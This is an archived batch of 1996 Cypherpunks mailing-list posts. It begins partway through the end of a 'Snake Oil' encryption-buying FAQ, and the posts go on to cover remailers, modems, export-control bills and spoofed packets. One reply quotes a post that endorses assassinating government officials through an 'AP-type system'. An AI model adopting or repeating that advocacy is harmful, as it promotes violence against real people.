     phrases and whole sentences as a "passphrase", which is more secure.

     Anything that restricts users' passwords to something like 10 or 16 or
     even 32 characters is foolish. If the actual "password" is the cipher's
     key (rather than hashing it into a key, as explained above), avoid it.

     If the vendor confuses the distinctions between bits, bytes and
     characters when discussing the key, avoid this product.

     Convenience is nice, but be wary of anything that sounds too easy to
     use. Avoid anything that lets anyone with your copy of the software to
     access files, data, etc. without having to use some sort of key or
     passphrase.

     Avoid anything that doesn't let you generate your own keys (ie, the
     vendor sends you a key in the mail, or it's embedded in the copy of the
     software you buy).

     Avoid anything by a vendor who does not seem to understand the
     difference between public-key (asymmetric) cryptography and private-key
     (symmetric) cryptography.

   * Lost keys and passwords

     If there's a third-party utility that can crack the software, avoid it.

     If the vendor claims it can recover lost passwords (without using a
     key-backup or escrow feature), avoid it.

     If there is a key-backup or escrow feature, are you in control of the
     backup, or does the vendor or someone else hold a copy of the key?

   * Exportable from the USA

     If the software is made in North America, can it be exported? If the
     answer is yes, chances are it's not very strong. Strong cryptography is
     considered munitions in terms of export from the United States, and
     requires approval from the State Department. Chances are if the
     software is exportable, the algorithm is weak or it is crackable (hence
     it was approved for export).

     If the vendor is unaware of export restrictions, avoid the software:
     the vendor is not familiar with the state of the art.

     Because of export restrictions, some legitimate (not-Snake Oil)
     products may have a freely exportable version for outside of the USA,
     which is different from a separate US/Canada-only distribution. Also
     note that just because software has made it outside of North America
     does not mean that it is exportable: sometimes a utility will be
     illegally exported and posted on an overseas site.

Other Considerations

Interface isn't everything: user-friendliness is an important factor, but if
the product isn't secure then you're better off with something that is
secure (if not as easy to use).

No product is secure if it's not used properly. You can be the weakest link
in the chain if you use a product carelessly. Do not trust any product to be
foolproof, and be wary any product that claims it is.

Contributors

The following folks have contributed to this FAQ.

Jeremey Barrett <jeremey@forequest.com>
<geeman@best.com>
Jim Ray <liberty@gate.net>
Robert Rothenburg Walking-Owl <wlkngowl@unix.asb.com>

References

  1. B. Schneier, Applied Cryptography, second edition, John Wiley & Sons,
     1996
  2. M. Blaze, W. Diffie, R. L. Rivest, B. Schneier, T. Shimomura, E.
     Thompson, M. Wiener, "Minimal Key Lengths for Symmetric Ciphers to
     Provide Adequate Commercial Security," available via
     ftp://ftp.research.att.com/dist/mab/keylength.ps

----------------------------------------------------------------------------
C Matthew Curtin
Last modified: Mon Sep 16 09:51:41 EDT
----------------------------------------------------------------------

-- 
C Matthew Curtin                MEGASOFT, INC                Chief Scientist
I speak only for myself.  Don't whine to anyone but me about anything I say.
Hacker Security Firewall Crypto PGP Privacy Unix Perl Java Internet Intranet
cmcurtin@research.megasoft.com http://research.megasoft.com/people/cmcurtin/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike McNally <m5@tivoli.com>
Date: Tue, 17 Sep 1996 03:35:02 +0800
To: jbugden@smtplink.alis.ca
Subject: Re: Workers Paradise. /Political rant.
In-Reply-To: <9608168428.AA842894324@smtplink.alis.ca>
Message-ID: <323D6B95.7BC9@tivoli.com>
MIME-Version: 1.0
Content-Type: text/plain


jbugden@smtplink.alis.ca wrote:
> 

> A social safety net is simply a form of health and life > insurance.

And a really neat-o form it is, too!  All it takes is an armed force
to coerce the unwilling into paying the premiums of those who don't
pay their own.

> Statistical arbitrage if you will. By spreading the risk you 
> minimize the cost.

Yea right.

> Yes, some people will take advantage of the system. But like a 
> virus, a robust system should be able to withstand this form of
> attack.

Sure; it's heavily armed, after all.  Just gather up some more
loot.


______c_________________________________________________________________
Mike M Nally * Tiv^H^H^H IBM * Austin TX * For the time being,
       m5@tivoli.com * m101@io.com       *    
      <URL:http://www.io.com/~m101>      * three heads and eight arms.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David K. Merriman" <merriman@amaonline.com>
Date: Tue, 17 Sep 1996 08:05:43 +0800
To: cypherpunks@toad.com
Subject: Re: Snake Oil FAQ 0.4 [comments appreciated]
Message-ID: <199609161705.KAA26825@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

To: cypherpunks@toad.com
Date: Mon Sep 16 12:05:17 1996
> (First off, I'd like to thank Matt for doing this.)
> 
> The key length stuff is good, but a common component of snake oil is
> that it claims to have very long key sizes.
> 
> | Some ciphers, while currently secure against most attacks, are not
> | considered viable in the next few years because of relatively small
>  keysizes
> | and increasing processor speeds (making a brute-force attacks
>  feasible). The
> | tables below should give some general guidelines for making intelligent
> | decisions about the key length you need. If the key is too short, the
>  system
> | will be easily broken, even if the cipher is a good one.
> | 
> | In [1] and [2], we're presented with some guidelines for deciding
> | appropriate key length. (It is important to note that this is based on
>  the
> | ability to predict computing power 40, 65, and 100 years from now.
>  Major
> | breakthroughs in computing power 30 years from now might render
>  everything
> | on this chart kiddieplay.)
> 
> |    * One-Time-Pads
> | 
> |      A vendor might claim the system uses a one-time-pad (OTP), which
>  is
> |      theoretically unbreakable. That is, snake-oil sellers will try
>  to
> |      capitalize on the known strength of a OTP. It is important to
> |      understand that any variation in the implementation means that it
>  is
> |      not an OTP, and has nowhere near the security of an OTP.
> | 
> |      A OTP system is not an algorithm. It works by having a "pad" of
>  random
> |      bits in the possession of both the sender and recipient. The
>  message is
> |      encrypted using the next n bits in the pad as they key, where n
>  is the
> |      number of bits in the message. After the bits are used from the
>  pad,
> |      they're destroyed, and can never again be used. The bits in the
>  pad
> |      must be truly random, generated using a real random source, such
>  as
> |      specialized hardware, radioactive decay timings, etc., and not
>  from an
> |      algorithm or cipher. Anything else is not a one-time-pad.
> 
>       The phrase easy-to-use should not appear in proximity to one
> time pad, except in the context 'Easier key management than a one time
> pad!"
> 

I would also suggest that the generation of OTP 'pads' for users is 
*highly* questionable. Who else is getting a copy of them, assuming they're 
even valid?

Dave Merriman

- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
PGP Email welcome, encouraged, and PREFERRED. Visit my web
site at         http://www.shellback.com/p/merriman
for my PGP key and fingerprint
"What is the sound of one hand clapping in a forest
with no one there to hear it?"
I use Pronto Secure (tm) PGP-fluent Email software for Windows
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMjzSBMVrTvyYOzAZAQGVwQP+N6vjyniDH0ad3G8dWu1cPHi5yfvksbS7
EJmgpSVTlaLf1Kp7rX2zBULxKvd2bqN3z3tAhj6reeG8la+P3Skw9gPJS8ggYvOn
cXwdRsCyRICgHYMcbaEB/91YsJMweYyzWLe2JZazs3NfsafxdNKerGR7kvoQF0bG
oBNR169sGlo=
=WqlN
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jbugden@smtplink.alis.ca
Date: Tue, 17 Sep 1996 02:09:12 +0800
To: tcmay@got.net (Timothy C. May)
Subject: RE: Workers Paradise. /Political rant.
Message-ID: <9608168428.AA842894324@smtplink.alis.ca>
MIME-Version: 1.0
Content-Type: text/plain


tcmay@got.net (Timothy C. May) wrote:
>"Saving for a rainy day," whether saving, investing, getting an education
(while others are out partying), preparing, etc., all takes effort and
commitment. If those who save and prepare are then told they have to pay
high taxes to support those who partied....well, the predictable effect 
[...] is _more_ people in agony. When you tell people that a compassionate
society will meet their basic needs, a predictable fraction of them will choose
not to work hard and prepare themselves.

Two questions, two observations:
Do you have health insurance?
Do you have life insurance?

I have commented on your line of reasoning before and and it still seems to me
that an important part of the discussion is missed. Specifically, that anyone
can "save for a rainy day" and still not be able to provide for events that can
always happen: Heart attack, stroke, car accident, pinched nerve that leaves you
in excruciating pain and unable to work for several years.

I don't think that a reasonable person would argue that medical insurance should
be outlawed because everyone should take care of their own needs. A social
safety net is simply a form of health and life insurance. Statistical arbitrage
if you will. By spreading the risk you minimize the cost. Yes, some people will
take advantage of the system. But like a virus, a robust system should be able
to withstand this form of attack.

I'm reminded of a Bloom County cartoon with Opus, Steve Dallas and Bill the cat
sitting on a park bench as a jogger runs past. he derides the trio saying, "I
jog three miles and work out every day, eat only healthy foods, and have regular
medical checkups. I'll live twice as long as you lazy slobs." In the next panel
the jogger is hit by lightning as the trio on the bench look on in shock. The
last panel: "Here's to no guarantees!" and "Pass the ding dongs."

Prend soin,
James

[Bible excerpt awaiting review as a motivation for human decency.]
The ground of a certain rich man brought forth plentifully: And he thought
within himself, saying, What shall I do, because I have no room where to bestow
my fruits? And he said, This will I do: I will pull down my barns, and build
greater; and there will I bestow all my fruits and my goods. And I will say to
my soul, Soul, thou hast much goods laid up for many years; take thine ease,
eat, drink, and be merry. But God said unto him, Thou fool, this night thy soul
shall be required of thee: then whose shall those things be, which thou hast
provided? 
[excerpted from Luke 12:16-20, King James Version]







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: craigw@dg.ce.com.au
Date: Mon, 16 Sep 1996 16:02:04 +0800
To: Asgaard <asgaard@Cor.sos.sll.se>
Subject: Re: 56 kbps modems
Message-ID: <199609160033.KAA29614@mac.ce.com.au>
MIME-Version: 1.0
Content-Type: text/plain


well here in Australia Telstra our national carrier only "garantees" 
2400 baud to work. I live within 2km of the exchange and the best I 
have ever achieved was 22k/sec over the lines (usually about 18k). 
This is not what the modem tells you it is doing....but what you get 
as a result of testing the ACTUAL modem speed using a line analizer 
program. What a modem manufacturer says you get and what the line 
gives you are Totaly separate.


> People who seemed to know used to say that 'the Shannon limit'
>set an absolute upper limit around 40 kbps. Has Shannon been
>proven wrong, or what?

        ,'~``.              \|/              ,'``~.
        (-o=o-)            (@ @)            ,(-o=o-),
+--.oooO--(_)--Ooo-----oOO-(_)-OOo-------oooO--(_)--Oooo.------+
|                                                              |
|   Soon, we may all be staring at our computers, wondering    |
|               whether they're staring back.                  |
|                                                              |
| [Network Admin For WPA Business Products.  aka doshai >;-) ] |
|    .oooO        http://pip.com.au/~doshai/      Oooo.        |
|    (   )   Oooo.                        .oooO   (   )        |
+-----\ (----(   )-------oooO-Oooo--------(   )--- ) /---------+
       \_)    ) /                          \ (    (_/
             (_/                            \_)
Key fingerprint = 2D F4 54 BB B4 EA F1 E7  B6 DE 48 92 FC 8D FF 49
Send a message with the subject "send pgp-key" for a copy of my key.
(if I want to give it to you)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jonathan <jonathan@dcs.gla.ac.uk>
Date: Mon, 16 Sep 1996 20:59:31 +0800
To: Geoff Dale <geoff1@home.net>
Subject: Re: (Long) RFC: Public Key Finger: A preliminary proposal for a               distributed key publishing system
In-Reply-To: <199609151909.MAA10901@toad.com>
Message-ID: <Pine.SUN.3.95.960916104738.2544C-100000@hawaii>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 15 Sep 1996, Geoff Dale wrote:

> The original (html) document may be obtained at:
> 
> http://www.fqa.com/geoff/pkf.htm
> 
> ---------------------------------------------------------------------------
>                                                          Version 0.2, Draft
> 
>                              Public Key Finger
> 
>                         (aka the People's Key Front)
> 
>        A preliminary proposal for a distributed key publishing system
> 
> ---------------------------------------------------------------------------
[snip]

is that the Judean People's Key Front, or the People's Key Front of Judea?

:-j


(old british joke, for the monty-python impaired...)

-- 
Jonathan AH Hogg, Computing Science, The University, Glasgow G12 8RZ, Scotland.
jonathan@dcs.gla.ac.uk http://www.dcs.gla.ac.uk/~jonathan (+44)141 3398855x2069





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an401dws@gold.ac.uk (Doug)
Date: Mon, 16 Sep 1996 20:40:22 +0800
To: cypherpunks@toad.com
Subject: New Remailers?
Message-ID: <1604.9609160953@gold.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


OK dont shoot me, im new to this list so please Bear with me:

I recently secured an account with anon.penet and then a few days later got
a post informing me that the servive was now terminated. Anybody out there
know of any remailers where you dont have to have a Phd in computer science
and a thorough working knowledge of PGP in order to operate?

Also, are there any remailers which will accept binary attachments?


doug





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@ai.mit.edu
Date: Tue, 17 Sep 1996 03:43:03 +0800
To: cypherpunks@toad.com
Subject: Re: SPL -- Suspicious Persons List
In-Reply-To: <199609160558.WAA11070@dfw-ix6.ix.netcom.com>
Message-ID: <9609161519.AA00274@etna.ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



>(Just because I don't believe in the concept of "corporate slavery"
>doesn't mean I don't think corporations can be offensive.  This sucks...)
>Out of curiousity, I thought the UK had Data Privacy Laws or
>some sort of Database Cops - does that not apply to applications like this?

The Tories put an exclusion into the act deliberately to cover the
Ecconomic League. Only record which are kept on computer are covered.
The Ecconomic League deliberately keeps all its records on paper to
avoid the act.

Its simply an example of privatized abuse. The information is available
to the government for party political work but they cannot be questioned 
about its activities because they "arn't involved" (sarcastic laughter).

This is the same government which used MI5 to monitor the activities of 
the peace movement and which used 5000 crack troops to evict 50 elderly
women from land they wanted to turn into a missile base. Whether you
agree or disagree with the policies the methods sound very much like those
of Hoover at the FBI with a strong dose of Nixon thrown in.


	Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 17 Sep 1996 07:58:52 +0800
To: cypherpunks@toad.com
Subject: RE: Workers Paradise. /Political rant.
In-Reply-To: <9608168428.AA842891743@smtplink.alis.ca>
Message-ID: <wyTcuD1w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


jbugden@smtplink.alis.ca writes:
> dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM) wrote:
> >Starting with the lying old fart himself.
> 
> You shouldn't be so hard on Tim. I tried giving up farting years ago but I =
> found
> I gained a lot of weight. It's also become more socially acceptable as evid=

I wonder why containing one's fart would cause one to gain weight. Volume maybe,
but I'd think that gas weight about as much as the air it displaces.

Cheers,

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 17 Sep 1996 13:14:57 +0800
To: cypherpunks@toad.com
Subject: U.S. Helped Wipe Out One of the Kurdish Factions
Message-ID: <ae634f0400021004c996@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:00 PM 9/16/96, jim bell wrote:

>condition which is forced on the victims. In addition, you almost always
>find that these starving countries have well-supplied militaries, defending
>the local warlords against each other as in Somalia.  Indeed, in Somalia the
>incoming food was actually used to buoy up one group against another,
>because access to it is controlled directly or indirectly by the factions.

The reports that the U.S. spent $100 million supporting the Kurdish
struggle against the central government is a related point.

The $100 M went into weapons, food, etc., which the U.S.-supported side
used against the Iran-supported side. Then the U.S.-supported side allied
themselves with the central government, however temporarily, and is not
engaging in a "mopping up operation" (translation: summary execution of all
members found of the losing side, including wives and children).

Our $100 million helped wipe out the "losing side" Kurds, and also
strengthened the previously-poor reputation of Saddam Hussein (who just got
a unanimous vote of support from the Arab League foreign ministers meeting
in Cairo...this likely  explains why the weekend's predicted massive raid
on Baghdad was shelved...Clinton is already backpedaling, and may send
Hilary/Hillary to Baghdad to help the Baghdad "Save the Children" chapter).

(Note: Only this last point, about Hilary, is made up...the rest is what is
actually happening.)

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com
Date: Tue, 17 Sep 1996 11:03:18 +0800
To: an401dws@gold.ac.uk (Doug)
Subject: Re: New Remailers?
Message-ID: <199609161835.OAA01049@attrh1.attrh.att.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:53 AM 9/16/96 BST, you wrote:
>I recently secured an account with anon.penet and then a few days later got
>a post informing me that the servive was now terminated. Anybody out there
>know of any remailers where you dont have to have a Phd in computer science
>and a thorough working knowledge of PGP in order to operate?

Raph Levien's remailer list lives at
        http://www.cs.berkeley.edu/~raph/remailer-list.html
Most of the remailers on it are the one-way variety - you can send
mail to someone anonymously, but you don't get an address for
people to reply to you.  They're easy to use.

Some of them also support anonymous reply blocks,
which are a somewhat difficult-to-use feature - you basically PGP-encrypt
your return address (in the correct syntax), and tell anybody who wants
to reply to you to include the block at the beginning of their mail.

There have been some pseudonym servers besides anon.penet.fi,
which provide higher security, and are easier to use than anonymous
reply blocks, once you set them up (which generally involves creating
anonymous reply blocks :-)  Two of them have been spammed to death,
but the cyber remailer at alias@alias.cyberpass.net is still up.
Send it a request for help to get information.  Raph has a new system
coming soon; see his remailer list for details.

Private Idaho is Joel McNamara's friendly user interface for
remailers and PGP.  http://www.eskimo.com/~joelm/pi_list.html .
Runs on MSWindows.  It made it _much_ easier to use the alpha nymserver
while that was still alive; don't know if the new version supports
cyber yet or not.

Remailer security depends on encryption - otherwise wiretappers
can watch mail going into the remailer and know where it's going.
So you'll need to learn to use PGP, but it's pretty straightforward,
and Private Idaho makes it more convenient.

The Mixmaster remailers provide higher security remailing,
also with no reply capability; you need to get special client software,
which I think isn't ported to Windows yet?


>Also, are there any remailers which will accept binary attachments?

There are three popular ways to do binary attachments -
1) MIME-encoding (uses MIME headers and maybe a 7-bit content transfer
encoding.)
2) UUENCODE (simple-minded header and 7-bit ASCII.)
3) Mail-handler-specific headers with binary stuff following

Uuencode is a no-brainer - just stick the uuencoded binary after
the remailer headers.  As far as I know, none of the remailers are
particularly MIME-aware, but they do glue headers together.
So you could probably start sticking MIME headers after the remailer
headers and try a few times to get it to work.

Mail-handler-specific behaviour is, of course, mail-handler-specific :-)
You can try it and see, and remember that the person at the other end
may not have the same kind of mail handler you do, so even if you sent
the mail directly instead of through a remailer, it might not work.
You may have trouble getting your mail client to do what you want
for sending the message (e.g. if you use Cc:Mail or MSMail.)

I looked at the code for my remailer, which is a modified Ghio2,
though I don't think I modified this part, and it'll trash binaries.
The problem is that, after processing headers, it shoves the rest
of the input stream into the output file by a loop of
        fgets()
        check for cutmarks
        fprintf()
which will trash anything that contains nulls, and may not do
the right thing for newlines either, though it won't bother high-bits.
I suppose it wouldn't be too hard to write a getchar/putchar loop
that checks for cutmarks while transferring data safely
(this would be easier if cutmark behaviour includes outputting the cutmark.)
However, the remailer uses the native mail program (e.g. sendmail)
to forward the mail, so if your sendmail trashes binaries,
or does annoying vestigial things like changing "From " to ">From "
at the beginnings of lines, it'll still lose.

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	
# You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com
Date: Tue, 17 Sep 1996 09:41:57 +0800
To: robert@precipice.v-site.net
Subject: HipCrime as MetaSPAM
Message-ID: <199609161835.OAA01055@attrh1.attrh.att.com>
MIME-Version: 1.0
Content-Type: text/plain


The Hippie Of Crime <robert@precipice.v-site.net>  also asked that
remailer operators not block HipCrime SPAM deliveries and all
mail to HipCrime because people might be interested in his
cool fractals and Java neural net lotto-predicters and anarchist pages.

If he wants to advertise to people about his other cool products,
he doesn't need to do it anonymously.  Furthermore, he doesn't provide
any method in his web pages for users to anonymously request information,
or to have information delivered anonymously.  So blocking him from
the remailers won't lose him anything.


#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	
# You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Tue, 17 Sep 1996 14:24:15 +0800
To: cypherpunks@toad.com
Subject: Re: Report on security of e-money by BIS
Message-ID: <v03007801ae63247346e7@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text


Sender: e$@thumper.vmeng.com
Reply-To: lvhove@vnet3.vub.ac.be (Leo Van Hove)
Mime-Version: 1.0
Precedence: Bulk
Date: Mon, 16 Sep 1996 10:39:14 +0100
From: lvhove@vnet3.vub.ac.be (Leo Van Hove)
To: Multiple recipients of <e$@thumper.vmeng.com>
Subject: Re: Report on security of e-money by BIS


>So, I am still keen on that report ...
>
>>  No political recommandations.
>(ok)
>>  Possibliy the report will soon be online. Meanwhile it should be
>>  possible to order a copy at www.bis.org.
>
>but the site has no email address or ordering info.  The report
>is not listed as far as I could see.  As I have a scanner, I
>shall attempt to secure a paper copy, but it looks like recourse
>to historical methods of communications is called for.  Now, how
>does one operate this push-button dial thingy...
>
>--
>iang
>iang@systemics.com


Found the following on the FRB of New York site at

http://www.ny.frb.org/pihome/news/g10.html

---

SECURITY MEASURES FOR ELECTRONIC MONEY ARE
              EFFECTIVE, G-10 TASK FORCE REPORTS

NEW YORK -- Existing security measures to protect electronic money
products, when
implemented correctly, can provide consumers and issuers adequate
protection from fraud, according to a report by G-10 central bank computer
and security experts.

The report, issued through the Bank for International Settlements, was
prepared by

<snip>

*** This report will be available in its entirely on this site in the near
future.***

---

leo


_________________________________________________________________________
Leo Van Hove

Centre for Financial Economics
Vrije Universiteit Brussel (Free University of Brussels)
Pleinlaan 2
B-1050 Brussels
vox: +32 2 629.21.25
fax: +32 2 629.22.82
e-mail:lvhove@vnet3.vub.ac.be
home page: http://cfec.vub.ac.be/cfec/leo.htm
_________________________________________________________________________




--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"'Bart Bucks' are not legal tender."
                -- Punishment, 100 times on a chalkboard,
                       for Bart Simpson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jfricker@vertexgroup.com (John F. Fricker)
Date: Tue, 17 Sep 1996 11:55:44 +0800
To: cypherpunks@toad.com
Subject: Re: J'accuse!: Whitehouse and NSA vs. Panix and VTW
Message-ID: <2.2.32.19960916190033.010773d0@vertexgroup.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:33 AM 9/13/96 -0700, stewarts@ix.netcom.com wrote:
>
>At least one of the newspaper articles I've read has referred to the need
>for real authentication on the net to prevent the anonymity that makes
>this kind of attack possible, and in particular for the major network providers
>to make sure that they don't export messages with bogus addressing,
>a cure that the article said would take several months to deploy.
>I don't know if they were referring to IPv6, or sendmail modifications,
>or router hacks, or what; the article's author seemed to think this was
>about bogusly-addressed email messages rather than understanding SYNs.
>

Well IPSec provides for authentication of endpoints which would identify the
syn attacker.

What amazes me is that routers happily pass packets with foreign IP return
addresses. I guess there is some valid utility to being able to originate a
connection that actually goes somewhere else for intiating a many to many
protocol. But I can't think of any practical application that would
necessarily be that way.

So why do routers let packets leave local networks that do not appear to
originate from said local network? Doesn't routing work "both ways" so to speak?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Howland <gary@systemics.com>
Date: Mon, 16 Sep 1996 20:49:48 +0800
To: craigw@dg.ce.com.au
Subject: Re: 56 kbps modems
In-Reply-To: <199609160033.KAA29614@mac.ce.com.au>
Message-ID: <323D28E8.15FB7483@systemics.com>
MIME-Version: 1.0
Content-Type: text/plain


craigw@dg.ce.com.au wrote:
> 
> well here in Australia Telstra our national carrier only "garantees"
> 2400 baud to work.

As I am sure has been discussed at length before, baud does not equal
bps.  AFAIK, V32bis is only 2400baud.

Gary
--
"Of course the US Constitution isn't perfect; but it's a lot better
than what we have now."  -- Unknown.

pub  1024/C001D00D 1996/01/22  Gary Howland <gary@systemics.com>
Key fingerprint =  0C FB 60 61 4D 3B 24 7D  1C 89 1D BE 1F EE 09 06




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Mon, 16 Sep 1996 23:52:42 +0800
To: cypherpunks@toad.com
Subject: IBM_gak
Message-ID: <199609161225.MAA10936@pipe1.ny3.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   9-15-96. PcWe: 
 
   "IBM Boosts Encryption Initiative " 
 
      IBM security initiatives next month will include a 
      new way to build encryption into software and 
      technology that could enable U.S. companies to export 
      products with strong encryption algorithms. IBM also 
      will introduce several "key-recovery" technologies 
      that could enable businesses to satisfy the 
      requirement imposed by the U.S. government that it be 
      able to access encrypted data on demand. IBM is 
      attempting to garner industry support for the new 
      key-recovery technology and is expected to license the 
      technology to Netscape and Sun. 
 
   9-13-96. BuWi: 
 
   "Revolutionary Intranet security product to be 
   demonstrated at Interop DotCom " 
 
      DSN's NetFortress fully automates hardware-based 
      authentication, encryption and key exchange into a 
      plug and play solution. It completely eliminates the 
      possibility of IP spoofing, eavesdropping and 
      break-ins. "After installing it, I couldn't even tell 
      which service a given packet was from - everything but 
      the packet header itself was rendered undecipherable 
      as it traversed the Internet." DSN Technology was 
      founded by Dr. Aharon Friedman and Andy Savas. 
 
   ----- 
 
   http://jya.com/ibmgak.txt  (6 kb for 2) 
 
   IBM_gak 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Tue, 17 Sep 1996 05:41:42 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: The Living and the Dead
In-Reply-To: <199609160416.VAA08027@mail.pacifier.com>
Message-ID: <Pine.BSF.3.91.960916123907.1578B-100000@mercury.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 15 Sep 1996, jim bell wrote:

> .... 
> How would an AP-type system treat Robert McNamara?  He'd be dead in a 
> second.  To those who say, "What good would this do?" I respond: Anyone in 
  ^^^^^^
Kind of kills the betting pool, doesn't it?

EBD



> the American government today who is considering an adventure which MIGHT 
> turn into another Vietnam should be deterred by the knowledge that sometime, 
> in 30 minutes or 30 years, he could be killed for what he did.   Robert 
> McNamara, presumably, did what he did because he thought he'd never be 
> punished.  The best way to deter future governmental abuse is to remind 
> these people that they _will_ be punished.
> 
> Jim Bell
> jimbell@pacifier.com
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@cypherpunks.ca (John Anonymous MacDonald)
Date: Tue, 17 Sep 1996 11:32:08 +0800
To: cypherpunks@toad.com
Subject: Pro-CODE bill may not help much
Message-ID: <199609161948.MAA07327@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


After reading the text of Senator Burns's pro-CODE bill (S.1726), I'm
not convinced that the bill would actually remove the barriers to the
export of PGP and other strong encryption software.  I'd like to know
whether you agree with my concerns, or if you think that the bill
would adequately protect encryption software exports.

shabbir@vtw.org (Voters Telecommunications Watch) writes:

>DESCRIPTION OF S.1726, PRO-CODE BILL

>The Pro-CODE Act resolves to:
>
>1.  Allow for the *unrestricted* export of "mass-market" or "public-domain"
>    encryption programs, including such products as Pretty Good Privacy and
>    popular World Wide Web browsers.
>
>2.  Requires the Secretary of Commerce to allow the less restricted export
>    of other encryption technologies if products of similar strength are
>    generally available outside the United States, roughly up to DES
>    strength.
>
>3.  Prohibits the federal government from imposing mandatory key-escrow
>    encryption policies on the domestic market and limiting the authority
>    of the Secretary of Commerce to set standards for encryption products.

I'm not sure that this interpretation of the pro-CODE bill is correct,
at least as far as points (1) and (2) are concerned.  It appears to me
that the bill allows the goverment to retrict all exports of
cyptographic software for general use, as long as similar retrictions
are imposed on the export of software for use by foreign banks.  PGP
could still be prohibited.  I will quote the relevant sections of the
bill, with my comments.

>From the text of the Pro-CODE Bill:

>SEC.3 DEFINITIONS.
>
>          (8) GENERAL LICENSE- The term "general license" means a
>        general authorization that is applicable to a type of
>        export that does not require an exporter of that type
>        export to, as a condition to exporting-
>               (A) submit a written application to the Secretary;
>                   or
>               (B) receive prior written authorization by the
>                   Secretary.

In other words, a "general license" means that rules may be
established regulating the export of certain materials, as long prior
written application or prior written authorization for the export is
not required.  For example, "Permission is hereby granted to export
all encryption software with a key length not exceeding 40 bits; no
written application is necessary." would be an example of a general
license to export a particular type of software.

>SEC. 5. PROMOTION OF COMMERCIAL ENCRYPTION PRODUCTS.
>
>      (c) CONTROL OF EXPORTING BY SECRETARY.-
>          (2) ITEMS THAT DO NOT REQUIRE VALIDATED LICENSES.-
>        Only a general license may be required, except as
>        otherwise provided under the Trading With The Enemy Act
>        (50 U.S.C. App.1 et seq.) or the International Emergency
>        Economic Powers Act (50 U.S.C. 1701 et seq.) (but only to 
>        the extent that the authority of the International 
>        Emergency Economic Power Act is not exercised to extend
>        controls imposed under the Export Administration Act of 
>        1979), for the export or reexport of-
>               (A) any computer software, including computer 
>                   software with encryption capabilities, that is-
>                   (i) generally available, as is, and designed
>                       for installation by the user or purchaser; or
>                   (ii) in the public domain (including on the 
>                       Internet) or publicly available because it
>                       is generally accessible to the interested
>                       public in any form; or
>               (B) any computing devise or computer hardware 
>                   solely because it incorporates or employs in 
>                   any form of computer software (including 
>                   computer software with encryption capabilities)
>                   that is described in subparagraph (A).

I interpret this to mean that export of this type of software can
still be restricted by the terms of a "general license".  Even though
prior written permission cannot be required for export, export is
permitted only if the terms of the general license are complied with.
This is not the same as "unrestricted export of mass market software";
in fact, for some types of software, the "general license" rules could
still forbid export entirely.

The following section describes the conditions under which the
Secretary of Commerce is required to grant a general license allowing
export:

>          (3) COMPUTER SOFTWARE AND COMPUTER HARDWARE WITH
>         ENCRYPTION CAPABILITIES.-
>               (A) IN GENERAL.- Except as provided in subparagraph
>                   (B), the Secretary shall authorize the export
